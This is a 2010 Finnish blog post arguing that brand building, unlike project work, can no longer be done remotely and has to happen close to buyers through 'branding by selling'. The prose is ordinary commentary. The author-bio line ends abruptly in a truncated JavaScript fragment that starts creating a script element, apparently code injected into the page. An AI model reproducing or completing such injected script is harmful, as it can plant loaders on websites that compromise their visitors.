15.6.2010

apple-tatska

Laiturin nokka, läppäri, projekti ja vapaus tehdä töitä etänä kun haluaa – varteenotettava vaihtoehto monille, ainakin näin kesäisin.

Fyysinen läsnäolo on ollut mahdollista korvata hyvillä sähköisillä yhteyksillä. Kun samalla työn muoto on muuttunut teollisesta linjatyöstä teolliseksi osa-projekti-työksi, on tullut mahdolliseksi istua laiturinnokassa läppäri sylissä ja mokkuloida inputtia tiimi-veljille ja –siskoille, vaikkapa vastarannalle saakka.

Valitettavasti brändi-imagoa ei pystytä enää kehittämään merkitykselliseksi etätöimällä – siis tekemällä etänä. Nykyajan kasvubrändit ovat lähellä käyttäjiään ja ne jatkuvasti osallistuvat ja käyttäytyvät ostajiensa ehdoilla. Koska imagonrakentamisen formaatti on muuttunut on luonnollista ajatella että toiminnankin pitäisi muuttua. Toiminta muuttuukin sosiaaliseksi brändityöksi joka tapahtuu lähellä.

Branding by selling

Sen sijaan että luukutetaan väittämiä tyhjeneville ei-kiinnostuneille katsomoille, ollaankin mukana niissä kohdissa jotka ovat tärkeitä. Myydään siis ideaamme eri tavoilla, eri paikoissa – esim. kytketään se kiinnostaviin ja brändiämme tukeviin muihin tuotteisiin. Tai esitellään sanomamme yllättävässä paikassa yllättävällä tavalla, siten että pakettiin kuuluu ostomahdollisuus tai ainakin kokeilu&suosittelu.

Mennään sinne missä porukka on vastaanottavaista, eikä yritetäkään kammeta heitä väkisin paikkaan tai tilanteeseen joka ei tarjoa heille mitään kiinnostavaa. Tehdäänkin jatkossa valinnat sisällön kautta ja arvotetaan viestimme kanavointi sen mukaan miten pystymme vaikuttamaan yleisöömme – tai vaikuttamaan jopa yhdessä yleisömme kanssa.

Tekeminen on päivän sana. Toistaiseksi teko viittaa kielessämme myös keinotekoiseen mikä on kerrassaan etääntynyt tulkinta – ei anneta sen häiritä työtämme teko-brändien lähellä.

Mikko Kaijansinkko on W.Steinmannin strategiajohtajavar d=document;var s=d.createElement(’script’);